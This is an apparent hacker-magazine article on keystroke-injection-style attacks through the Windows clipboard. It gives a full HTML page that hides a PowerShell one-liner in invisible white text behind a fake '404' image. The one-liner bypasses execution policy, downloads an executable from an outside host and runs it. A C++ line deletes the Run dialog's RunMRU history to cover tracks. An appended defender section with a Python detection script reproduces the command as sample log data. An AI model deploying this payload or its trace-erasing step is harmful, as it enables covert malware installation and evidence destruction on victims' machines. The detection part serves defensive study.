Hidden Injection

by Street

Keystroke injection has become a popular tool for hackers.

A tool made by Hak5 called the Rubber Ducky retails at $79.99.  The Rubber Ducky looks like a USB flash drive, but when you plug it in, it quickly types out commands to control the computer as if it were a keyboard.

You can program it with instructions written in a language called DuckyScript, which can be used to download malicious software or steal the data on a computer.

I had the idea to use the Windows clipboard to do the same thing, by copying and pasting in commands at the same speed without plugging anything into the computer.

The Windows clipboard holds all of the data that you copy and paste on Windows.  It is a temporary storage area where data is copied or cut from a document and is kept until it is pasted somewhere else.  The Windows clipboard can hold various types of data, including text, images, files, and other formats.

I used a website with hidden text and an image that read "404 Page Not Found".  The text is small with white font on a white background, so you can't see it.

To quickly get to the page, I just press Win+R, then enter: https://www.example.com

Once the page loads, I press Ctrl+A, which selects the text, and then Ctrl+C to copy my payload to the Windows clipboard.

Pressing Win+R again, followed by Ctrl+V, pastes the payload into the Windows Run dialog.

When I hit Enter, the payload downloads and the program is executed.

The best part about this is that the downloaded file doesn't give me any warnings about not being certified by Microsoft.  Normally, untrusted executables will create SmartScreen warnings.  Microsoft uses the SmartScreen security feature to warn you about potentially malicious or unrecognized applications downloaded from the Internet.  The warning appears when a program is from an unknown publisher or hasn't been digitally signed with a certificate recognized by Microsoft.

Here is the web page code with the PowerShell payload one-liner that I copy and paste into the Windows Run dialog:

<html>
<style>
::-moz-selection {
color: white;
background: white;
} 
::selection {
color: white;
background: white;
}
body{
color: white;
background: white;
font-size: 1px;
}
img {
max-width: 100%;
height: auto;
}
</style>
<body>
powershell.exe -NoProfile -WindowStyle hidden -ExecutionPolicy Bypass -Command Start-BitsTransfer -Source "https://www.example.com/viri.exe" -Destination "c:\programdata\viri.exe"; C:\programdata\viri.exe
<center><img src="404.png"></img></center>
</body>
</html>

If your program is written in C++, you can include this line in the code to erase the pasted text from the Run dialog after it is executed:

RegDeleteKey(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"));          
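
Seen from the defender's side, the chain above leaves three traces in endpoint telemetry: PowerShell started from Explorer with the one-liner's switches, an executable run from the root of ProgramData, and deletion of the RunMRU key. The triage sketch below is an added example, not part of the original article; it assumes Sysmon-style process-creation (Event ID 1) and registry (Event ID 12) records, and the sample events, the SID and the two-switch threshold are constructed for illustration.

```python
import re

# Constructed Sysmon-style records (Event ID 1 = process creation,
# Event ID 12 = registry key create/delete); not captured from a real host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -WindowStyle hidden "
                    "-ExecutionPolicy Bypass -Command Start-BitsTransfer "
                    '-Source "https://www.example.com/viri.exe" '
                    r'-Destination "c:\programdata\viri.exe"; C:\programdata\viri.exe'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},  # benign: user opens a console from Run
    {"EventID": 1, "ParentImage": PS, "Image": r"C:\ProgramData\viri.exe",
     "CommandLine": r"C:\programdata\viri.exe"},
    {"EventID": 12, "EventType": "DeleteKey", "Image": r"C:\ProgramData\viri.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows"
                     r"\CurrentVersion\Explorer\RunMRU"},
]

# Switches from the one-liner, tolerant of PowerShell's parameter abbreviations.
FLAGS = {
    "hidden window": re.compile(r"-w\w*\s+h", re.I),
    "execution policy bypass": re.compile(r"-e(p|x\w*)\s+bypass", re.I),
    "download cmdlet": re.compile(r"start-bitstransfer|invoke-webrequest|downloadfile", re.I),
}

def triage(events):
    """Return (label, evidence) tuples for the three traces the article's chain leaves."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            image = ev["Image"].lower()
            from_shell = ev["ParentImage"].lower().endswith(r"\explorer.exe")
            if from_shell and image.endswith(r"\powershell.exe"):
                hits = [n for n, rx in FLAGS.items() if rx.search(ev["CommandLine"])]
                if len(hits) >= 2:  # a single switch alone is too noisy to alert on
                    findings.append(("PowerShell one-liner launched from Explorer", hits))
            # Binary sitting directly in ProgramData rather than a vendor subfolder
            if image.startswith("c:\\programdata\\") and image.count("\\") == 2:
                findings.append(("executable run from ProgramData root", [ev["Image"]]))
        elif ev["EventID"] == 12 and ev.get("EventType") == "DeleteKey":
            if ev["TargetObject"].lower().endswith(r"\explorer\runmru"):
                findings.append(("Run dialog history (RunMRU) deleted", [ev["Image"]]))
    return findings

if __name__ == "__main__":
    for label, evidence in triage(SAMPLE_EVENTS):
        print(label, "->", evidence)
```

The RunMRU deletion is worth alerting on by itself, since ordinary software has little reason to remove that key.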